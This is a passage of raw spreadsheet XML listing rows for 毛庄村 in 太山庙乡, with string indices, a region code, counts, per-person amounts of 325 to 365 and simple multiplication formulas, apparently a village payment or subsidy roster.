      <c r="I2086" s="17">
        <f>H2086*G2086</f>
        <v>365</v>
      </c>
      <c r="J2086" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2086" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2087" customHeight="1" spans="1:11">
      <c r="A2087" s="16" t="s">
        <v>5535</v>
      </c>
      <c r="B2087" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2087" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2087" s="17" t="s">
        <v>5536</v>
      </c>
      <c r="E2087" s="17" t="s">
        <v>5525</v>
      </c>
      <c r="F2087" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2087" s="17">
        <v>1</v>
      </c>
      <c r="H2087" s="18">
        <v>365</v>
      </c>
      <c r="I2087" s="17">
        <f>H2087*G2087</f>
        <v>365</v>
      </c>
      <c r="J2087" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2087" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2088" customHeight="1" spans="1:11">
      <c r="A2088" s="16" t="s">
        <v>5537</v>
      </c>
      <c r="B2088" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2088" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2088" s="17" t="s">
        <v>5538</v>
      </c>
      <c r="E2088" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2088" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2088" s="17">
        <v>1</v>
      </c>
      <c r="H2088" s="18">
        <v>365</v>
      </c>
      <c r="I2088" s="17">
        <f>H2088*G2088</f>
        <v>365</v>
      </c>
      <c r="J2088" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2088" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2089" customHeight="1" spans="1:11">
      <c r="A2089" s="16" t="s">
        <v>5540</v>
      </c>
      <c r="B2089" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2089" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2089" s="17" t="s">
        <v>5541</v>
      </c>
      <c r="E2089" s="17" t="s">
        <v>5542</v>
      </c>
      <c r="F2089" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2089" s="17">
        <v>2</v>
      </c>
      <c r="H2089" s="18">
        <v>325</v>
      </c>
      <c r="I2089" s="17">
        <f>H2089*G2089</f>
        <v>650</v>
      </c>
      <c r="J2089" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2089" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2090" customHeight="1" spans="1:11">
      <c r="A2090" s="16" t="s">
        <v>5543</v>
      </c>
      <c r="B2090" s="17" t="str">
        <f>B2089</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2090" s="17" t="str">
        <f>C2089</f>
        <v>毛庄村</v>
      </c>
      <c r="D2090" s="16" t="s">
        <v>5544</v>
      </c>
      <c r="E2090" s="16" t="s">
        <v>5545</v>
      </c>
      <c r="F2090" s="17">
        <f>F2089</f>
        <v>4113210704</v>
      </c>
      <c r="G2090" s="17"/>
      <c r="H2090" s="17"/>
      <c r="I2090" s="17"/>
      <c r="J2090" s="17"/>
      <c r="K2090" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2091" customHeight="1" spans="1:11">
      <c r="A2091" s="16" t="s">
        <v>5546</v>
      </c>
      <c r="B2091" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2091" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2091" s="17" t="s">
        <v>5547</v>
      </c>
      <c r="E2091" s="17" t="s">
        <v>5513</v>
      </c>
      <c r="F2091" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2091" s="17">
        <v>1</v>
      </c>
      <c r="H2091" s="18">
        <v>365</v>
      </c>
      <c r="I2091" s="17">
        <f>H2091*G2091</f>
        <v>365</v>
      </c>
      <c r="J2091" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2091" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2092" customHeight="1" spans="1:11">
      <c r="A2092" s="16" t="s">
        <v>5548</v>
      </c>
      <c r="B2092" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2092" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2092" s="17" t="s">
        <v>5549</v>
      </c>
      <c r="E2092" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2092" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2092" s="17">
        <v>2</v>
      </c>
      <c r="H2092" s="18">
        <v>325</v>
      </c>
      <c r="I2092" s="17">
        <f>H2092*G2092</f>
        <v>650</v>
      </c>
      <c r="J2092" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2092" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2093" customHeight="1" spans="1:11">
      <c r="A2093" s="16" t="s">
        <v>5551</v>
      </c>
      <c r="B2093" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2093" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2093" s="17" t="s">
        <v>5552</v>
      </c>
      <c r="E2093" s="17" t="s">
        <v>5519</v>
      </c>
      <c r="F2093" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2093" s="17"/>
      <c r="I2093" s="17"/>
      <c r="J2093" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2093" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2094" customHeight="1" spans="1:11">
      <c r="A2094" s="16" t="s">
        <v>5553</v>
      </c>
      <c r="B2094" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2094" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2094" s="17" t="s">
        <v>5554</v>
      </c>
      <c r="E2094" s="17" t="s">
        <v>5555</v>
      </c>
      <c r="F2094" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2094" s="17">
        <v>1</v>
      </c>
      <c r="H2094" s="18">
        <v>365</v>
      </c>
      <c r="I2094" s="17">
        <f>H2094*G2094</f>
        <v>365</v>
      </c>
      <c r="J2094" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2094" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2095" customHeight="1" spans="1:11">
      <c r="A2095" s="16" t="s">
        <v>5556</v>
      </c>
      <c r="B2095" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2095" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2095" s="17" t="s">
        <v>5557</v>
      </c>
      <c r="E2095" s="17" t="s">
        <v>2806</v>
      </c>
      <c r="F2095" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2095" s="17">
        <v>2</v>
      </c>
      <c r="H2095" s="18">
        <v>345</v>
      </c>
      <c r="I2095" s="17">
        <f>H2095*G2095</f>
        <v>690</v>
      </c>
      <c r="J2095" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2095" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2096" customHeight="1" spans="1:11">
      <c r="A2096" s="16" t="s">
        <v>5558</v>
      </c>
      <c r="B2096" s="17" t="str">
        <f>B2095</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2096" s="17" t="str">
        <f>C2095</f>
        <v>毛庄村</v>
      </c>
      <c r="D2096" s="16" t="s">
        <v>5559</v>
      </c>
      <c r="E2096" s="16" t="s">
        <v>5560</v>
      </c>
      <c r="F2096" s="17">
        <f>F2095</f>
        <v>4113210704</v>
      </c>
      <c r="G2096" s="17"/>
      <c r="H2096" s="17"/>
      <c r="I2096" s="17"/>
      <c r="J2096" s="17"/>
      <c r="K2096" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2097" customHeight="1" spans="1:11">
      <c r="A2097" s="16" t="s">
        <v>5561</v>
      </c>
      <c r="B2097" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2097" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2097" s="17" t="s">
        <v>5562</v>
      </c>
      <c r="E2097" s="17" t="s">
        <v>5563</v>
      </c>
      <c r="F2097" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2097" s="17">
        <v>2</v>
      </c>
      <c r="H2097" s="18">
        <v>325</v>
      </c>
      <c r="I2097" s="17">
        <f>H2097*G2097</f>
        <v>650</v>
      </c>
      <c r="J2097" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2097" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2098" customHeight="1" spans="1:11">
      <c r="A2098" s="16" t="s">
        <v>5564</v>
      </c>
      <c r="B2098" s="17" t="str">
        <f>B2097</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2098" s="17" t="str">
        <f>C2097</f>
        <v>毛庄村</v>
      </c>
      <c r="D2098" s="16" t="s">
        <v>5565</v>
      </c>
      <c r="E2098" s="16" t="s">
        <v>5566</v>
      </c>
      <c r="F2098" s="17">
        <f>F2097</f>
        <v>4113210704</v>
      </c>
      <c r="G2098" s="17"/>
      <c r="H2098" s="17"/>
      <c r="I2098" s="17"/>
      <c r="J2098" s="17"/>
      <c r="K2098" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2099" customHeight="1" spans="1:11">
      <c r="A2099" s="16" t="s">
        <v>5567</v>
      </c>
      <c r="B2099" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2099" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2099" s="17" t="s">
        <v>5568</v>
      </c>
      <c r="E2099" s="17" t="s">
        <v>5569</v>
      </c>
      <c r="F2099" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2099" s="17">
        <v>1</v>
      </c>
      <c r="H2099" s="18">
        <v>365</v>
      </c>
      <c r="I2099" s="17">
        <f>H2099*G2099</f>
        <v>365</v>
      </c>
      <c r="J2099" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2099" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2100" customHeight="1" spans="1:11">
      <c r="A2100" s="16" t="s">
        <v>5570</v>
      </c>
      <c r="B2100" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2100" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2100" s="17" t="s">
        <v>5571</v>
      </c>
      <c r="E2100" s="17" t="s">
        <v>5414</v>
      </c>
      <c r="F2100" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2100" s="17">
        <v>1</v>
      </c>
      <c r="H2100" s="18">
        <v>365</v>
      </c>
      <c r="I2100" s="17">
        <f>H2100*G2100</f>
        <v>365</v>
      </c>
      <c r="J2100" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2100" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2101" customHeight="1" spans="1:11">
      <c r="A2101" s="16" t="s">
        <v>5572</v>
      </c>
      <c r="B2101" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2101" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2101" s="17" t="s">
        <v>5573</v>
      </c>
      <c r="E2101" s="17" t="s">
        <v>5465</v>
      </c>
      <c r="F2101" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2101" s="17">
        <v>1</v>
      </c>
      <c r="H2101" s="18">
        <v>365</v>
      </c>
      <c r="I2101" s="17">
        <f>H2101*G2101</f>
        <v>365</v>
      </c>
      <c r="J2101" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2101" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2102" customHeight="1" spans="1:11">
      <c r="A2102" s="16" t="s">
        <v>5574</v>
      </c>
      <c r="B2102" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2102" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2102" s="17" t="s">
        <v>5575</v>
      </c>
      <c r="E2102" s="17" t="s">
        <v>5576</v>
      </c>
      <c r="F2102" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2102" s="17">
        <v>1</v>
      </c>
      <c r="H2102" s="18">
        <v>365</v>
      </c>
      <c r="I2102" s="17">
        <f>H2102*G2102</f>
        <v>365</v>
      </c>
      <c r="J2102" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2102" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2103" customHeight="1" spans="1:11">
      <c r="A2103" s="16" t="s">
        <v>5577</v>
      </c>
      <c r="B2103" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2103" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2103" s="17" t="s">
        <v>5578</v>
      </c>
      <c r="E2103" s="17" t="s">
        <v>5460</v>
      </c>
      <c r="F2103" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2103" s="17">
        <v>2</v>
      </c>
      <c r="H2103" s="18">
        <v>325</v>
      </c>
      <c r="I2103" s="17">
        <f>H2103*G2103</f>
        <v>650</v>
      </c>
      <c r="J2103" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2103" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2104" customHeight="1" spans="1:11">
      <c r="A2104" s="16" t="s">
        <v>5579</v>
      </c>
      <c r="B2104" s="17" t="str">
        <f>B2103</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2104" s="17" t="str">
        <f>C2103</f>
        <v>毛庄村</v>
      </c>
      <c r="D2104" s="16" t="s">
        <v>5580</v>
      </c>
      <c r="E2104" s="25" t="s">
        <v>5519</v>
      </c>
      <c r="F2104" s="17">
        <f>F2103</f>
        <v>4113210704</v>
      </c>
      <c r="G2104" s="17"/>
      <c r="H2104" s="17"/>
      <c r="I2104" s="17"/>
      <c r="J2104" s="17"/>
      <c r="K2104" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2105" customHeight="1" spans="1:11">
      <c r="A2105" s="16" t="s">
        <v>5581</v>
      </c>
      <c r="B2105" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2105" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2105" s="17" t="s">
        <v>5582</v>
      </c>
      <c r="E2105" s="17" t="s">
        <v>5583</v>
      </c>
      <c r="F2105" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2105" s="17">
        <v>2</v>
      </c>
      <c r="H2105" s="18">
        <v>325</v>
      </c>
      <c r="I2105" s="17">
        <f>H2105*G2105</f>
        <v>650</v>
      </c>
      <c r="J2105" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2105" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2106" customHeight="1" spans="1:11">
      <c r="A2106" s="16" t="s">
        <v>5584</v>
      </c>
      <c r="B2106" s="17" t="str">
        <f>B2105</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2106" s="17" t="str">
        <f>C2105</f>
        <v>毛庄村</v>
      </c>
      <c r="D2106" s="16" t="s">
        <v>5585</v>
      </c>
      <c r="E2106" s="16" t="s">
        <v>5525</v>
      </c>
      <c r="F2106" s="17">
        <f>F2105</f>
        <v>4113210704</v>
      </c>
      <c r="G2106" s="17"/>
      <c r="H2106" s="17"/>
      <c r="I2106" s="17"/>
      <c r="J2106" s="17"/>
      <c r="K2106" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2107" customHeight="1" spans="1:11">
      <c r="A2107" s="16" t="s">
        <v>5586</v>
      </c>
      <c r="B2107" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2107" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2107" s="17" t="s">
        <v>5587</v>
      </c>
      <c r="E2107" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2107" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2107" s="17">
        <v>2</v>
      </c>
      <c r="H2107" s="18">
        <v>325</v>
      </c>
      <c r="I2107" s="17">
        <f>H2107*G2107</f>
        <v>650</v>
      </c>
      <c r="J2107" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2107" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2108" customHeight="1" spans="1:11">
      <c r="A2108" s="16" t="s">
        <v>5588</v>
      </c>
      <c r="B2108" s="17" t="str">
        <f>B2107</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2108" s="17" t="str">
        <f>C2107</f>
        <v>毛庄村</v>
      </c>
      <c r="D2108" s="16" t="s">
        <v>5589</v>
      </c>
      <c r="E2108" s="16" t="s">
        <v>3486</v>
      </c>
      <c r="F2108" s="17">
        <f>F2107</f>
        <v>4113210704</v>
      </c>
      <c r="G2108" s="17"/>
      <c r="H2108" s="17"/>
      <c r="I2108" s="17"/>
      <c r="J2108" s="17"/>
      <c r="K2108" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2109" customHeight="1" spans="1:11">
      <c r="A2109" s="16" t="s">
        <v>5590</v>
      </c>
      <c r="B2109" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2109" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2109" s="17" t="s">
        <v>5591</v>
      </c>
      <c r="E2109" s="17" t="s">
        <v>5592</v>
      </c>
      <c r="F2109" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2109" s="17">
        <v>2</v>
      </c>
      <c r="H2109" s="18">
        <v>325</v>
      </c>
      <c r="I2109" s="17">
        <f>H2109*G2109</f>
        <v>650</v>
      </c>
      <c r="J2109" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2109" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2110" customHeight="1" spans="1:11">
      <c r="A2110" s="16" t="s">
        <v>5593</v>
      </c>
      <c r="B2110" s="17" t="str">
        <f>B2109</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2110" s="17" t="str">
        <f>C2109</f>
        <v>毛庄村</v>
      </c>
      <c r="D2110" s="16" t="s">
        <v>5594</v>
      </c>
      <c r="E2110" s="16" t="s">
        <v>3486</v>
      </c>
      <c r="F2110" s="17">
        <f>F2109</f>
        <v>4113210704</v>
      </c>
      <c r="G2110" s="17"/>
      <c r="H2110" s="17"/>
      <c r="I2110" s="17"/>
      <c r="J2110" s="17"/>
      <c r="K2110" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2111" customHeight="1" spans="1:11">
      <c r="A2111" s="16" t="s">
        <v>5595</v>
      </c>
      <c r="B2111" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2111" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2111" s="17" t="s">
        <v>5596</v>
      </c>
      <c r="E2111" s="17" t="s">
        <v>5597</v>
      </c>
      <c r="F2111" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2111" s="17">
        <v>1</v>
      </c>
      <c r="H2111" s="18">
        <v>365</v>
      </c>
      <c r="I2111" s="17">
        <f>H2111*G2111</f>
        <v>365</v>
      </c>
      <c r="J2111" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2111" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2112" customHeight="1" spans="1:11">
      <c r="A2112" s="16" t="s">
        <v>5598</v>
      </c>
      <c r="B2112" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2112" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2112" s="17" t="s">
        <v>5599</v>
      </c>
      <c r="E2112" s="17" t="s">
        <v>5600</v>
      </c>
      <c r="F2112" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2112" s="17">
        <v>2</v>
      </c>
      <c r="H2112" s="18">
        <v>325</v>
      </c>
      <c r="I2112" s="17">
        <f>H2112*G2112</f>
        <v>650</v>
      </c>
      <c r="J2112" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2112" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2113" customHeight="1" spans="1:11">
      <c r="A2113" s="16" t="s">
        <v>5601</v>
      </c>
      <c r="B2113" s="17" t="str">
        <f>B2112</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2113" s="17" t="str">
        <f>C2112</f>
        <v>毛庄村</v>
      </c>
      <c r="D2113" s="16" t="s">
        <v>5602</v>
      </c>
      <c r="E2113" s="16" t="s">
        <v>5042</v>
      </c>
      <c r="F2113" s="17">
        <f>F2112</f>
        <v>4113210704</v>
      </c>
      <c r="G2113" s="17"/>
      <c r="H2113" s="17"/>
      <c r="I2113" s="17"/>
      <c r="J2113" s="17"/>
      <c r="K2113" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2114" customHeight="1" spans="1:11">
      <c r="A2114" s="16" t="s">
        <v>5603</v>
      </c>
      <c r="B2114" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2114" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2114" s="17" t="s">
        <v>5604</v>
      </c>
      <c r="E2114" s="17" t="s">
        <v>5042</v>
      </c>
      <c r="F2114" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2114" s="17">
        <v>1</v>
      </c>
      <c r="H2114" s="18">
        <v>365</v>
      </c>
      <c r="I2114" s="17">
        <f>H2114*G2114</f>
        <v>365</v>
      </c>
      <c r="J2114" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2114" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2115" customHeight="1" spans="1:11">
      <c r="A2115" s="16" t="s">
        <v>5605</v>
      </c>
      <c r="B2115" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2115" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2115" s="17" t="s">
        <v>5606</v>
      </c>
      <c r="E2115" s="17" t="s">
        <v>5539</v>
      </c>
      <c r="F2115" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2115" s="17">
        <v>2</v>
      </c>
      <c r="H2115" s="18">
        <v>325</v>
      </c>
      <c r="I2115" s="17">
        <f>H2115*G2115</f>
        <v>650</v>
      </c>
      <c r="J2115" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2115" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2116" customHeight="1" spans="1:11">
      <c r="A2116" s="16" t="s">
        <v>5607</v>
      </c>
      <c r="B2116" s="17" t="str">
        <f>B2115</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2116" s="17" t="str">
        <f>C2115</f>
        <v>毛庄村</v>
      </c>
      <c r="D2116" s="16" t="s">
        <v>5608</v>
      </c>
      <c r="E2116" s="25" t="s">
        <v>5431</v>
      </c>
      <c r="F2116" s="17">
        <f>F2115</f>
        <v>4113210704</v>
      </c>
      <c r="G2116" s="17"/>
      <c r="H2116" s="17"/>
      <c r="I2116" s="17"/>
      <c r="J2116" s="17"/>
      <c r="K2116" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2117" customHeight="1" spans="1:11">
      <c r="A2117" s="16" t="s">
        <v>5609</v>
      </c>
      <c r="B2117" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2117" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2117" s="17" t="s">
        <v>5610</v>
      </c>
      <c r="E2117" s="17" t="s">
        <v>5611</v>
      </c>
      <c r="F2117" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2117" s="17">
        <v>2</v>
      </c>
      <c r="H2117" s="18">
        <v>325</v>
      </c>
      <c r="I2117" s="17">
        <f>H2117*G2117</f>
        <v>650</v>
      </c>
      <c r="J2117" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2117" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2118" customHeight="1" spans="1:11">
      <c r="A2118" s="16" t="s">
        <v>5612</v>
      </c>
      <c r="B2118" s="17" t="str">
        <f>B2117</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2118" s="17" t="str">
        <f>C2117</f>
        <v>毛庄村</v>
      </c>
      <c r="D2118" s="16" t="s">
        <v>5613</v>
      </c>
      <c r="E2118" s="16" t="s">
        <v>5614</v>
      </c>
      <c r="F2118" s="17">
        <f>F2117</f>
        <v>4113210704</v>
      </c>
      <c r="G2118" s="17"/>
      <c r="H2118" s="17"/>
      <c r="I2118" s="17"/>
      <c r="J2118" s="17"/>
      <c r="K2118" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2119" customHeight="1" spans="1:11">
      <c r="A2119" s="16" t="s">
        <v>5615</v>
      </c>
      <c r="B2119" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2119" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2119" s="17" t="s">
        <v>5616</v>
      </c>
      <c r="E2119" s="17" t="s">
        <v>5611</v>
      </c>
      <c r="F2119" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2119" s="17">
        <v>2</v>
      </c>
      <c r="H2119" s="18">
        <v>325</v>
      </c>
      <c r="I2119" s="17">
        <f>H2119*G2119</f>
        <v>650</v>
      </c>
      <c r="J2119" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2119" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2120" customHeight="1" spans="1:11">
      <c r="A2120" s="16" t="s">
        <v>5617</v>
      </c>
      <c r="B2120" s="17" t="str">
        <f>B2119</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2120" s="17" t="str">
        <f>C2119</f>
        <v>毛庄村</v>
      </c>
      <c r="D2120" s="16" t="s">
        <v>5618</v>
      </c>
      <c r="E2120" s="16" t="s">
        <v>5431</v>
      </c>
      <c r="F2120" s="17">
        <f>F2119</f>
        <v>4113210704</v>
      </c>
      <c r="G2120" s="17"/>
      <c r="H2120" s="17"/>
      <c r="I2120" s="17"/>
      <c r="J2120" s="17"/>
      <c r="K2120" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2121" customHeight="1" spans="1:11">
      <c r="A2121" s="16" t="s">
        <v>5619</v>
      </c>
      <c r="B2121" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2121" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2121" s="17" t="s">
        <v>5620</v>
      </c>
      <c r="E2121" s="17" t="s">
        <v>3486</v>
      </c>
      <c r="F2121" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2121" s="17">
        <v>1</v>
      </c>
      <c r="H2121" s="18">
        <v>365</v>
      </c>
      <c r="I2121" s="17">
        <f>H2121*G2121</f>
        <v>365</v>
      </c>
      <c r="J2121" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2121" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2122" customHeight="1" spans="1:11">
      <c r="A2122" s="16" t="s">
        <v>5621</v>
      </c>
      <c r="B2122" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2122" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2122" s="17" t="s">
        <v>5622</v>
      </c>
      <c r="E2122" s="17" t="s">
        <v>5446</v>
      </c>
      <c r="F2122" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2122" s="17">
        <v>1</v>
      </c>
      <c r="H2122" s="18">
        <v>365</v>
      </c>
      <c r="I2122" s="17">
        <f>H2122*G2122</f>
        <v>365</v>
      </c>
      <c r="J2122" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2122" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2123" customHeight="1" spans="1:11">
      <c r="A2123" s="16" t="s">
        <v>5623</v>
      </c>
      <c r="B2123" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2123" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2123" s="17" t="s">
        <v>5624</v>
      </c>
      <c r="E2123" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2123" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2123" s="17">
        <v>2</v>
      </c>
      <c r="H2123" s="18">
        <v>325</v>
      </c>
      <c r="I2123" s="17">
        <f>H2123*G2123</f>
        <v>650</v>
      </c>
      <c r="J2123" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2123" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2124" customHeight="1" spans="1:11">
      <c r="A2124" s="16" t="s">
        <v>5625</v>
      </c>
      <c r="B2124" s="17" t="str">
        <f>B2123</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2124" s="17" t="str">
        <f>C2123</f>
        <v>毛庄村</v>
      </c>
      <c r="D2124" s="16" t="s">
        <v>5626</v>
      </c>
      <c r="E2124" s="16" t="s">
        <v>5566</v>
      </c>
      <c r="F2124" s="17">
        <f>F2123</f>
        <v>4113210704</v>
      </c>
      <c r="G2124" s="17"/>
      <c r="H2124" s="17"/>
      <c r="I2124" s="17"/>
      <c r="J2124" s="17"/>
      <c r="K2124" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2125" customHeight="1" spans="1:11">
      <c r="A2125" s="16" t="s">
        <v>5627</v>
      </c>
      <c r="B2125" s="17" t="s">
        <v>5398</v>
      </c>
      <c r="C2125" s="17" t="s">
        <v>5399</v>
      </c>
      <c r="D2125" s="17" t="s">
        <v>5628</v>
      </c>
      <c r="E2125" s="17" t="s">
        <v>5550</v>
      </c>
      <c r="F2125" s="17">
        <v>4113210704</v>
      </c>
      <c r="G2125" s="17">
        <v>2</v>
      </c>
      <c r="H2125" s="18">
        <v>325</v>
      </c>
      <c r="I2125" s="17">
        <f>H2125*G2125</f>
        <v>650</v>
      </c>
      <c r="J2125" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2125" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2126" customHeight="1" spans="1:11">
      <c r="A2126" s="16" t="s">
        <v>5629</v>
      </c>
      <c r="B2126" s="17" t="str">
        <f>B2125</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2126" s="17" t="str">
        <f>C2125</f>
        <v>毛庄村</v>
      </c>
      <c r="D2126" s="16" t="s">
        <v>5630</v>
      </c>
